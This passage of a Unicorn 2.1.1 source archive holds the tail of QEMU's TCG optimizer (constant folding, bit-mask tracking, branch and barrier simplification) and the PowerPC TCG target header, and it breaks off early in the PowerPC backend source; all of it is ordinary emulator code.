op->args[2] is constant, we can't infer anything from it. */ if (arg_is_const(op->args[2])) { mask = ~arg_info(op->args[2])->mask; goto and_const; } /* But we certainly know nothing outside args[1] may be set. */ mask = arg_info(op->args[1])->mask; break; case INDEX_op_sar_i32: if (arg_is_const(op->args[2])) { tmp = arg_info(op->args[2])->val & 31; mask = (int32_t)arg_info(op->args[1])->mask >> tmp; } break; case INDEX_op_sar_i64: if (arg_is_const(op->args[2])) { tmp = arg_info(op->args[2])->val & 63; mask = (int64_t)arg_info(op->args[1])->mask >> tmp; } break; case INDEX_op_shr_i32: if (arg_is_const(op->args[2])) { tmp = arg_info(op->args[2])->val & 31; mask = (uint32_t)arg_info(op->args[1])->mask >> tmp; } break; case INDEX_op_shr_i64: if (arg_is_const(op->args[2])) { tmp = arg_info(op->args[2])->val & 63; mask = (uint64_t)arg_info(op->args[1])->mask >> tmp; } break; case INDEX_op_extrl_i64_i32: mask = (uint32_t)arg_info(op->args[1])->mask; break; case INDEX_op_extrh_i64_i32: mask = (uint64_t)arg_info(op->args[1])->mask >> 32; break; CASE_OP_32_64(shl): if (arg_is_const(op->args[2])) { tmp = arg_info(op->args[2])->val & (TCG_TARGET_REG_BITS - 1); mask = arg_info(op->args[1])->mask << tmp; } break; CASE_OP_32_64(neg): /* Set to 1 all bits to the left of the rightmost. */ #ifdef _MSC_VER mask = 0 - (arg_info(op->args[1])->mask & (0 - arg_info(op->args[1])->mask)); #else mask = -(arg_info(op->args[1])->mask & -arg_info(op->args[1])->mask); #endif break; CASE_OP_32_64(deposit): mask = deposit64(arg_info(op->args[1])->mask, op->args[3], op->args[4], arg_info(op->args[2])->mask); break; CASE_OP_32_64(extract): mask = extract64(arg_info(op->args[1])->mask, op->args[2], op->args[3]); if (op->args[2] == 0) { affected = arg_info(op->args[1])->mask & ~mask; } break; CASE_OP_32_64(sextract): mask = sextract64(arg_info(op->args[1])->mask, op->args[2], op->args[3]); if (op->args[2] == 0 && (tcg_target_long)mask >= 0) { affected = arg_info(op->args[1])->mask & ~mask; } break; CASE_OP_32_64(or): CASE_OP_32_64(xor): mask = arg_info(op->args[1])->mask | arg_info(op->args[2])->mask; break; case INDEX_op_clz_i32: case INDEX_op_ctz_i32: mask = arg_info(op->args[2])->mask | 31; break; case INDEX_op_clz_i64: case INDEX_op_ctz_i64: mask = arg_info(op->args[2])->mask | 63; break; case INDEX_op_ctpop_i32: mask = 32 | 31; break; case INDEX_op_ctpop_i64: mask = 64 | 63; break; CASE_OP_32_64(setcond): case INDEX_op_setcond2_i32: mask = 1; break; CASE_OP_32_64(movcond): mask = arg_info(op->args[3])->mask | arg_info(op->args[4])->mask; break; CASE_OP_32_64(ld8u): mask = 0xff; break; CASE_OP_32_64(ld16u): mask = 0xffff; break; case INDEX_op_ld32u_i64: mask = 0xffffffffu; break; CASE_OP_32_64(qemu_ld): { TCGMemOpIdx oi = op->args[nb_oargs + nb_iargs]; MemOp mop = get_memop(oi); if (!(mop & MO_SIGN)) { mask = (2ULL << ((8 << (mop & MO_SIZE)) - 1)) - 1; } } break; default: break; } /* 32-bit ops generate 32-bit results. For the result is zero test below, we can ignore high bits, but for further optimizations we need to record that the high bits contain garbage. */ partmask = mask; if (!(def->flags & TCG_OPF_64BIT)) { mask |= ~(tcg_target_ulong)0xffffffffu; partmask &= 0xffffffffu; affected &= 0xffffffffu; } if (partmask == 0) { tcg_debug_assert(nb_oargs == 1); tcg_opt_gen_movi(s, op, op->args[0], 0); continue; } if (affected == 0) { tcg_debug_assert(nb_oargs == 1); tcg_opt_gen_mov(s, op, op->args[0], op->args[1]); continue; } /* Simplify expression for "op r, a, 0 => movi r, 0" cases */ switch (opc) { CASE_OP_32_64_VEC(and): CASE_OP_32_64_VEC(mul): CASE_OP_32_64(muluh): CASE_OP_32_64(mulsh): if (arg_is_const(op->args[2]) && arg_info(op->args[2])->val == 0) { tcg_opt_gen_movi(s, op, op->args[0], 0); continue; } break; default: break; } /* Simplify expression for "op r, a, a => mov r, a" cases */ switch (opc) { CASE_OP_32_64_VEC(or): CASE_OP_32_64_VEC(and): if (args_are_copies(op->args[1], op->args[2])) { tcg_opt_gen_mov(s, op, op->args[0], op->args[1]); continue; } break; default: break; } /* Simplify expression for "op r, a, a => movi r, 0" cases */ switch (opc) { CASE_OP_32_64_VEC(andc): CASE_OP_32_64_VEC(sub): CASE_OP_32_64_VEC(xor): if (args_are_copies(op->args[1], op->args[2])) { tcg_opt_gen_movi(s, op, op->args[0], 0); continue; } break; default: break; } /* Propagate constants through copy operations and do constant folding. Constants will be substituted to arguments by register allocator where needed and possible. Also detect copies. */ switch (opc) { CASE_OP_32_64_VEC(mov): tcg_opt_gen_mov(s, op, op->args[0], op->args[1]); break; CASE_OP_32_64(movi): case INDEX_op_dupi_vec: tcg_opt_gen_movi(s, op, op->args[0], op->args[1]); break; case INDEX_op_dup_vec: if (arg_is_const(op->args[1])) { tmp = arg_info(op->args[1])->val; tmp = dup_const(TCGOP_VECE(op), tmp); tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(not): CASE_OP_32_64(neg): CASE_OP_32_64(ext8s): CASE_OP_32_64(ext8u): CASE_OP_32_64(ext16s): CASE_OP_32_64(ext16u): CASE_OP_32_64(ctpop): CASE_OP_32_64(bswap16): CASE_OP_32_64(bswap32): case INDEX_op_bswap64_i64: case INDEX_op_ext32s_i64: case INDEX_op_ext32u_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: case INDEX_op_extrl_i64_i32: case INDEX_op_extrh_i64_i32: if (arg_is_const(op->args[1])) { tmp = do_constant_folding(s, opc, arg_info(op->args[1])->val, 0); tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(add): CASE_OP_32_64(sub): CASE_OP_32_64(mul): CASE_OP_32_64(or): CASE_OP_32_64(and): CASE_OP_32_64(xor): CASE_OP_32_64(shl): CASE_OP_32_64(shr): CASE_OP_32_64(sar): CASE_OP_32_64(rotl): CASE_OP_32_64(rotr): CASE_OP_32_64(andc): CASE_OP_32_64(orc): CASE_OP_32_64(eqv): CASE_OP_32_64(nand): CASE_OP_32_64(nor): CASE_OP_32_64(muluh): CASE_OP_32_64(mulsh): CASE_OP_32_64(div): CASE_OP_32_64(divu): CASE_OP_32_64(rem): CASE_OP_32_64(remu): if (arg_is_const(op->args[1]) && arg_is_const(op->args[2])) { tmp = do_constant_folding(s, opc, arg_info(op->args[1])->val, arg_info(op->args[2])->val); tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(clz): CASE_OP_32_64(ctz): if (arg_is_const(op->args[1])) { TCGArg v = arg_info(op->args[1])->val; if (v != 0) { tmp = do_constant_folding(s, opc, v, 0); tcg_opt_gen_movi(s, op, op->args[0], tmp); } else { tcg_opt_gen_mov(s, op, op->args[0], op->args[2]); } break; } goto do_default; CASE_OP_32_64(deposit): if (arg_is_const(op->args[1]) && arg_is_const(op->args[2])) { tmp = deposit64(arg_info(op->args[1])->val, op->args[3], op->args[4], arg_info(op->args[2])->val); tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(extract): if (arg_is_const(op->args[1])) { tmp = extract64(arg_info(op->args[1])->val, op->args[2], op->args[3]); tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(sextract): if (arg_is_const(op->args[1])) { tmp = sextract64(arg_info(op->args[1])->val, op->args[2], op->args[3]); tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(extract2): if (arg_is_const(op->args[1]) && arg_is_const(op->args[2])) { TCGArg v1 = arg_info(op->args[1])->val; TCGArg v2 = arg_info(op->args[2])->val; if (opc == INDEX_op_extract2_i64) { tmp = (v1 >> op->args[3]) | (v2 << (64 - op->args[3])); } else { tmp = (int32_t)(((uint32_t)v1 >> op->args[3]) | ((uint32_t)v2 << (32 - op->args[3]))); } tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(setcond): tmp = do_constant_folding_cond(s, opc, op->args[1], op->args[2], op->args[3]); if (tmp != 2) { tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(brcond): tmp = do_constant_folding_cond(s, opc, op->args[0], op->args[1], op->args[2]); if (tmp != 2) { if (tmp) { bitmap_zero(temps_used.l, nb_temps); op->opc = INDEX_op_br; op->args[0] = op->args[3]; } else { tcg_op_remove(s, op); } break; } goto do_default; CASE_OP_32_64(movcond): tmp = do_constant_folding_cond(s, opc, op->args[1], op->args[2], op->args[5]); if (tmp != 2) { tcg_opt_gen_mov(s, op, op->args[0], op->args[4-tmp]); break; } if (arg_is_const(op->args[3]) && arg_is_const(op->args[4])) { tcg_target_ulong tv = arg_info(op->args[3])->val; tcg_target_ulong fv = arg_info(op->args[4])->val; TCGCond cond = op->args[5]; if (fv == 1 && tv == 0) { cond = tcg_invert_cond(cond); } else if (!(tv == 1 && fv == 0)) { goto do_default; } op->args[3] = cond; op->opc = opc = (opc == INDEX_op_movcond_i32 ? INDEX_op_setcond_i32 : INDEX_op_setcond_i64); nb_iargs = 2; } goto do_default; case INDEX_op_add2_i32: case INDEX_op_sub2_i32: if (arg_is_const(op->args[2]) && arg_is_const(op->args[3]) && arg_is_const(op->args[4]) && arg_is_const(op->args[5])) { uint32_t al = arg_info(op->args[2])->val; uint32_t ah = arg_info(op->args[3])->val; uint32_t bl = arg_info(op->args[4])->val; uint32_t bh = arg_info(op->args[5])->val; uint64_t a = ((uint64_t)ah << 32) | al; uint64_t b = ((uint64_t)bh << 32) | bl; TCGArg rl, rh; TCGOp *op2 = tcg_op_insert_before(s, op, INDEX_op_movi_i32); if (opc == INDEX_op_add2_i32) { a += b; } else { a -= b; } rl = op->args[0]; rh = op->args[1]; tcg_opt_gen_movi(s, op, rl, (int32_t)a); tcg_opt_gen_movi(s, op2, rh, (int32_t)(a >> 32)); break; } goto do_default; case INDEX_op_mulu2_i32: if (arg_is_const(op->args[2]) && arg_is_const(op->args[3])) { uint32_t a = arg_info(op->args[2])->val; uint32_t b = arg_info(op->args[3])->val; uint64_t r = (uint64_t)a * b; TCGArg rl, rh; TCGOp *op2 = tcg_op_insert_before(s, op, INDEX_op_movi_i32); rl = op->args[0]; rh = op->args[1]; tcg_opt_gen_movi(s, op, rl, (int32_t)r); tcg_opt_gen_movi(s, op2, rh, (int32_t)(r >> 32)); break; } goto do_default; case INDEX_op_brcond2_i32: tmp = do_constant_folding_cond2(&op->args[0], &op->args[2], op->args[4]); if (tmp != 2) { if (tmp) { do_brcond_true: bitmap_zero(temps_used.l, nb_temps); op->opc = INDEX_op_br; op->args[0] = op->args[5]; } else { do_brcond_false: tcg_op_remove(s, op); } } else if ((op->args[4] == TCG_COND_LT || op->args[4] == TCG_COND_GE) && arg_is_const(op->args[2]) && arg_info(op->args[2])->val == 0 && arg_is_const(op->args[3]) && arg_info(op->args[3])->val == 0) { /* Simplify LT/GE comparisons vs zero to a single compare vs the high word of the input. */ do_brcond_high: bitmap_zero(temps_used.l, nb_temps); op->opc = INDEX_op_brcond_i32; op->args[0] = op->args[1]; op->args[1] = op->args[3]; op->args[2] = op->args[4]; op->args[3] = op->args[5]; } else if (op->args[4] == TCG_COND_EQ) { /* Simplify EQ comparisons where one of the pairs can be simplified. */ tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, op->args[0], op->args[2], TCG_COND_EQ); if (tmp == 0) { goto do_brcond_false; } else if (tmp == 1) { goto do_brcond_high; } tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, op->args[1], op->args[3], TCG_COND_EQ); if (tmp == 0) { goto do_brcond_false; } else if (tmp != 1) { goto do_default; } do_brcond_low: bitmap_zero(temps_used.l, nb_temps); op->opc = INDEX_op_brcond_i32; op->args[1] = op->args[2]; op->args[2] = op->args[4]; op->args[3] = op->args[5]; } else if (op->args[4] == TCG_COND_NE) { /* Simplify NE comparisons where one of the pairs can be simplified. */ tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, op->args[0], op->args[2], TCG_COND_NE); if (tmp == 0) { goto do_brcond_high; } else if (tmp == 1) { goto do_brcond_true; } tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, op->args[1], op->args[3], TCG_COND_NE); if (tmp == 0) { goto do_brcond_low; } else if (tmp == 1) { goto do_brcond_true; } goto do_default; } else { goto do_default; } break; case INDEX_op_setcond2_i32: tmp = do_constant_folding_cond2(&op->args[1], &op->args[3], op->args[5]); if (tmp != 2) { do_setcond_const: tcg_opt_gen_movi(s, op, op->args[0], tmp); } else if ((op->args[5] == TCG_COND_LT || op->args[5] == TCG_COND_GE) && arg_is_const(op->args[3]) && arg_info(op->args[3])->val == 0 && arg_is_const(op->args[4]) && arg_info(op->args[4])->val == 0) { /* Simplify LT/GE comparisons vs zero to a single compare vs the high word of the input. */ do_setcond_high: reset_temp(op->args[0]); arg_info(op->args[0])->mask = 1; op->opc = INDEX_op_setcond_i32; op->args[1] = op->args[2]; op->args[2] = op->args[4]; op->args[3] = op->args[5]; } else if (op->args[5] == TCG_COND_EQ) { /* Simplify EQ comparisons where one of the pairs can be simplified. */ tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, op->args[1], op->args[3], TCG_COND_EQ); if (tmp == 0) { goto do_setcond_const; } else if (tmp == 1) { goto do_setcond_high; } tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, op->args[2], op->args[4], TCG_COND_EQ); if (tmp == 0) { goto do_setcond_high; } else if (tmp != 1) { goto do_default; } do_setcond_low: reset_temp(op->args[0]); arg_info(op->args[0])->mask = 1; op->opc = INDEX_op_setcond_i32; op->args[2] = op->args[3]; op->args[3] = op->args[5]; } else if (op->args[5] == TCG_COND_NE) { /* Simplify NE comparisons where one of the pairs can be simplified. */ tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, op->args[1], op->args[3], TCG_COND_NE); if (tmp == 0) { goto do_setcond_high; } else if (tmp == 1) { goto do_setcond_const; } tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, op->args[2], op->args[4], TCG_COND_NE); if (tmp == 0) { goto do_setcond_low; } else if (tmp == 1) { goto do_setcond_const; } goto do_default; } else { goto do_default; } break; case INDEX_op_call: if (!(op->args[nb_oargs + nb_iargs + 1] & (TCG_CALL_NO_READ_GLOBALS | TCG_CALL_NO_WRITE_GLOBALS))) { for (i = 0; i < nb_globals; i++) { if (test_bit(i, temps_used.l)) { reset_ts(&s->temps[i]); } } } goto do_reset_output; default: do_default: /* Default case: we know nothing about operation (or were unable to compute the operation result) so no propagation is done. We trash everything if the operation is the end of a basic block, otherwise we only trash the output args. "mask" is the non-zero bits mask for the first output arg. */ if (def->flags & TCG_OPF_BB_END) { bitmap_zero(temps_used.l, nb_temps); } else { do_reset_output: for (i = 0; i < nb_oargs; i++) { reset_temp(op->args[i]); /* Save the corresponding known-zero bits mask for the first output argument (only one supported so far). */ if (i == 0) { arg_info(op->args[i])->mask = mask; } } } break; } /* Eliminate duplicate and redundant fence instructions. */ if (prev_mb) { switch (opc) { case INDEX_op_mb: /* Merge two barriers of the same type into one, * or a weaker barrier into a stronger one, * or two weaker barriers into a stronger one. * mb X; mb Y => mb X|Y * mb; strl => mb; st * ldaq; mb => ld; mb * ldaq; strl => ld; mb; st * Other combinations are also merged into a strong * barrier. This is stricter than specified but for * the purposes of TCG is better than not optimizing. */ prev_mb->args[0] |= op->args[0]; tcg_op_remove(s, op); break; default: /* Opcodes that end the block stop the optimization. */ if ((def->flags & TCG_OPF_BB_END) == 0) { break; } /* fallthru */ case INDEX_op_qemu_ld_i32: case INDEX_op_qemu_ld_i64: case INDEX_op_qemu_st_i32: case INDEX_op_qemu_st_i64: case INDEX_op_call: /* Opcodes that touch guest memory stop the optimization. */ prev_mb = NULL; break; } } else if (opc == INDEX_op_mb) { prev_mb = op; } } } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/ppc/�������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015512�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/ppc/tcg-target.h�������������������������������������������������������������0000664�0000000�0000000�00000015474�14675241067�0017737�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef PPC_TCG_TARGET_H #define PPC_TCG_TARGET_H #ifdef _ARCH_PPC64 # define TCG_TARGET_REG_BITS 64 #else # define TCG_TARGET_REG_BITS 32 #endif #define TCG_TARGET_NB_REGS 64 #define TCG_TARGET_INSN_UNIT_SIZE 4 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 16 typedef enum { TCG_REG_R0, TCG_REG_R1, TCG_REG_R2, TCG_REG_R3, TCG_REG_R4, TCG_REG_R5, TCG_REG_R6, TCG_REG_R7, TCG_REG_R8, TCG_REG_R9, TCG_REG_R10, TCG_REG_R11, TCG_REG_R12, TCG_REG_R13, TCG_REG_R14, TCG_REG_R15, TCG_REG_R16, TCG_REG_R17, TCG_REG_R18, TCG_REG_R19, TCG_REG_R20, TCG_REG_R21, TCG_REG_R22, TCG_REG_R23, TCG_REG_R24, TCG_REG_R25, TCG_REG_R26, TCG_REG_R27, TCG_REG_R28, TCG_REG_R29, TCG_REG_R30, TCG_REG_R31, TCG_REG_V0, TCG_REG_V1, TCG_REG_V2, TCG_REG_V3, TCG_REG_V4, TCG_REG_V5, TCG_REG_V6, TCG_REG_V7, TCG_REG_V8, TCG_REG_V9, TCG_REG_V10, TCG_REG_V11, TCG_REG_V12, TCG_REG_V13, TCG_REG_V14, TCG_REG_V15, TCG_REG_V16, TCG_REG_V17, TCG_REG_V18, TCG_REG_V19, TCG_REG_V20, TCG_REG_V21, TCG_REG_V22, TCG_REG_V23, TCG_REG_V24, TCG_REG_V25, TCG_REG_V26, TCG_REG_V27, TCG_REG_V28, TCG_REG_V29, TCG_REG_V30, TCG_REG_V31, TCG_REG_CALL_STACK = TCG_REG_R1, TCG_AREG0 = TCG_REG_R27 } TCGReg; typedef enum { tcg_isa_base, tcg_isa_2_06, tcg_isa_2_07, tcg_isa_3_00, } TCGPowerISA; extern TCGPowerISA have_isa; extern bool have_altivec; extern bool have_vsx; #define have_isa_2_06 (have_isa >= tcg_isa_2_06) #define have_isa_2_07 (have_isa >= tcg_isa_2_07) #define have_isa_3_00 (have_isa >= tcg_isa_3_00) /* optional instructions automatically implemented */ #define TCG_TARGET_HAS_ext8u_i32 0 /* andi */ #define TCG_TARGET_HAS_ext16u_i32 0 /* optional instructions */ #define TCG_TARGET_HAS_div_i32 1 #define TCG_TARGET_HAS_rem_i32 0 #define TCG_TARGET_HAS_rot_i32 1 #define TCG_TARGET_HAS_ext8s_i32 1 #define TCG_TARGET_HAS_ext16s_i32 1 #define TCG_TARGET_HAS_bswap16_i32 1 #define TCG_TARGET_HAS_bswap32_i32 1 #define TCG_TARGET_HAS_not_i32 1 #define TCG_TARGET_HAS_neg_i32 1 #define TCG_TARGET_HAS_andc_i32 1 #define TCG_TARGET_HAS_orc_i32 1 #define TCG_TARGET_HAS_eqv_i32 1 #define TCG_TARGET_HAS_nand_i32 1 #define TCG_TARGET_HAS_nor_i32 1 #define TCG_TARGET_HAS_clz_i32 1 #define TCG_TARGET_HAS_ctz_i32 have_isa_3_00 #define TCG_TARGET_HAS_ctpop_i32 have_isa_2_06 #define TCG_TARGET_HAS_deposit_i32 1 #define TCG_TARGET_HAS_extract_i32 1 #define TCG_TARGET_HAS_sextract_i32 0 #define TCG_TARGET_HAS_extract2_i32 0 #define TCG_TARGET_HAS_movcond_i32 1 #define TCG_TARGET_HAS_mulu2_i32 0 #define TCG_TARGET_HAS_muls2_i32 0 #define TCG_TARGET_HAS_muluh_i32 1 #define TCG_TARGET_HAS_mulsh_i32 1 #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_direct_jump 1 #if TCG_TARGET_REG_BITS == 64 #define TCG_TARGET_HAS_add2_i32 0 #define TCG_TARGET_HAS_sub2_i32 0 #define TCG_TARGET_HAS_extrl_i64_i32 0 #define TCG_TARGET_HAS_extrh_i64_i32 0 #define TCG_TARGET_HAS_div_i64 1 #define TCG_TARGET_HAS_rem_i64 0 #define TCG_TARGET_HAS_rot_i64 1 #define TCG_TARGET_HAS_ext8s_i64 1 #define TCG_TARGET_HAS_ext16s_i64 1 #define TCG_TARGET_HAS_ext32s_i64 1 #define TCG_TARGET_HAS_ext8u_i64 0 #define TCG_TARGET_HAS_ext16u_i64 0 #define TCG_TARGET_HAS_ext32u_i64 0 #define TCG_TARGET_HAS_bswap16_i64 1 #define TCG_TARGET_HAS_bswap32_i64 1 #define TCG_TARGET_HAS_bswap64_i64 1 #define TCG_TARGET_HAS_not_i64 1 #define TCG_TARGET_HAS_neg_i64 1 #define TCG_TARGET_HAS_andc_i64 1 #define TCG_TARGET_HAS_orc_i64 1 #define TCG_TARGET_HAS_eqv_i64 1 #define TCG_TARGET_HAS_nand_i64 1 #define TCG_TARGET_HAS_nor_i64 1 #define TCG_TARGET_HAS_clz_i64 1 #define TCG_TARGET_HAS_ctz_i64 have_isa_3_00 #define TCG_TARGET_HAS_ctpop_i64 have_isa_2_06 #define TCG_TARGET_HAS_deposit_i64 1 #define TCG_TARGET_HAS_extract_i64 1 #define TCG_TARGET_HAS_sextract_i64 0 #define TCG_TARGET_HAS_extract2_i64 0 #define TCG_TARGET_HAS_movcond_i64 1 #define TCG_TARGET_HAS_add2_i64 1 #define TCG_TARGET_HAS_sub2_i64 1 #define TCG_TARGET_HAS_mulu2_i64 0 #define TCG_TARGET_HAS_muls2_i64 0 #define TCG_TARGET_HAS_muluh_i64 1 #define TCG_TARGET_HAS_mulsh_i64 1 #endif /* * While technically Altivec could support V64, it has no 64-bit store * instruction and substituting two 32-bit stores makes the generated * code quite large. */ #define TCG_TARGET_HAS_v64 have_vsx #define TCG_TARGET_HAS_v128 have_altivec #define TCG_TARGET_HAS_v256 0 #define TCG_TARGET_HAS_andc_vec 1 #define TCG_TARGET_HAS_orc_vec have_isa_2_07 #define TCG_TARGET_HAS_not_vec 1 #define TCG_TARGET_HAS_neg_vec have_isa_3_00 #define TCG_TARGET_HAS_abs_vec 0 #define TCG_TARGET_HAS_shi_vec 0 #define TCG_TARGET_HAS_shs_vec 0 #define TCG_TARGET_HAS_shv_vec 1 #define TCG_TARGET_HAS_cmp_vec 1 #define TCG_TARGET_HAS_mul_vec 1 #define TCG_TARGET_HAS_sat_vec 1 #define TCG_TARGET_HAS_minmax_vec 1 #define TCG_TARGET_HAS_bitsel_vec have_vsx #define TCG_TARGET_HAS_cmpsel_vec 0 void flush_icache_range(uintptr_t start, uintptr_t stop); void tb_target_set_jmp_target(uintptr_t, uintptr_t, uintptr_t); #define TCG_TARGET_DEFAULT_MO (0) #define TCG_TARGET_HAS_MEMORY_BSWAP 1 #ifdef CONFIG_SOFTMMU #define TCG_TARGET_NEED_LDST_LABELS #endif #define TCG_TARGET_NEED_POOL_LABELS #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/ppc/tcg-target.inc.c���������������������������������������������������������0000664�0000000�0000000�00000354273�14675241067�0020505�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "elf.h" #include "../tcg-pool.inc.c" #if defined _CALL_DARWIN || defined __APPLE__ #define TCG_TARGET_CALL_DARWIN #endif #ifdef _CALL_SYSV # define TCG_TARGET_CALL_ALIGN_ARGS 1 #endif /* For some memory operations, we need a scratch that isn't R0. For the AIX calling convention, we can re-use the TOC register since we'll be reloading it at every call. Otherwise R12 will do nicely as neither a call-saved register nor a parameter register. */ #ifdef _CALL_AIX # define TCG_REG_TMP1 TCG_REG_R2 #else # define TCG_REG_TMP1 TCG_REG_R12 #endif #define TCG_VEC_TMP1 TCG_REG_V0 #define TCG_VEC_TMP2 TCG_REG_V1 #define TCG_REG_TB TCG_REG_R31 #define USE_REG_TB (TCG_TARGET_REG_BITS == 64) /* Shorthand for size of a pointer. Avoid promotion to unsigned. */ #define SZP ((int)sizeof(void *)) /* Shorthand for size of a register. */ #define SZR (TCG_TARGET_REG_BITS / 8) #define TCG_CT_CONST_S16 0x100 #define TCG_CT_CONST_U16 0x200 #define TCG_CT_CONST_S32 0x400 #define TCG_CT_CONST_U32 0x800 #define TCG_CT_CONST_ZERO 0x1000 #define TCG_CT_CONST_MONE 0x2000 #define TCG_CT_CONST_WSZ 0x4000 static tcg_insn_unit *tb_ret_addr; TCGPowerISA have_isa; static bool have_isel; bool have_altivec; bool have_vsx; #ifndef CONFIG_SOFTMMU #define TCG_GUEST_BASE_REG 30 #endif #ifdef CONFIG_DEBUG_TCG static const char tcg_target_reg_names[TCG_TARGET_NB_REGS][4] = { "r0", "r1", "r2", "r3", "r4", "r5", "r6", "r7", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15", "r16", "r17", "r18", "r19", "r20", "r21", "r22", "r23", "r24", "r25", "r26", "r27", "r28", "r29", "r30", "r31", "v0", "v1", "v2", "v3", "v4", "v5", "v6", "v7", "v8", "v9", "v10", "v11", "v12", "v13", "v14", "v15", "v16", "v17", "v18", "v19", "v20", "v21", "v22", "v23", "v24", "v25", "v26", "v27", "v28", "v29", "v30", "v31", }; #endif static const int tcg_target_reg_alloc_order[] = { TCG_REG_R14, /* call saved registers */ TCG_REG_R15, TCG_REG_R16, TCG_REG_R17, TCG_REG_R18, TCG_REG_R19, TCG_REG_R20, TCG_REG_R21, TCG_REG_R22, TCG_REG_R23, TCG_REG_R24, TCG_REG_R25, TCG_REG_R26, TCG_REG_R27, TCG_REG_R28, TCG_REG_R29, TCG_REG_R30, TCG_REG_R31, TCG_REG_R12, /* call clobbered, non-arguments */ TCG_REG_R11, TCG_REG_R2, TCG_REG_R13, TCG_REG_R10, /* call clobbered, arguments */ TCG_REG_R9, TCG_REG_R8, TCG_REG_R7, TCG_REG_R6, TCG_REG_R5, TCG_REG_R4, TCG_REG_R3, /* V0 and V1 reserved as temporaries; V20 - V31 are call-saved */ TCG_REG_V2, /* call clobbered, vectors */ TCG_REG_V3, TCG_REG_V4, TCG_REG_V5, TCG_REG_V6, TCG_REG_V7, TCG_REG_V8, TCG_REG_V9, TCG_REG_V10, TCG_REG_V11, TCG_REG_V12, TCG_REG_V13, TCG_REG_V14, TCG_REG_V15, TCG_REG_V16, TCG_REG_V17, TCG_REG_V18, TCG_REG_V19, }; static const int tcg_target_call_iarg_regs[] = { TCG_REG_R3, TCG_REG_R4, TCG_REG_R5, TCG_REG_R6, TCG_REG_R7, TCG_REG_R8, TCG_REG_R9, TCG_REG_R10 }; static const int tcg_target_call_oarg_regs[] = { TCG_REG_R3, TCG_REG_R4 }; static const int tcg_target_callee_save_regs[] = { #ifdef TCG_TARGET_CALL_DARWIN TCG_REG_R11, #endif TCG_REG_R14, TCG_REG_R15, TCG_REG_R16, TCG_REG_R17, TCG_REG_R18, TCG_REG_R19, TCG_REG_R20, TCG_REG_R21, TCG_REG_R22, TCG_REG_R23, TCG_REG_R24, TCG_REG_R25, TCG_REG_R26, TCG_REG_R27, /* currently used for the global env */ TCG_REG_R28, TCG_REG_R29, 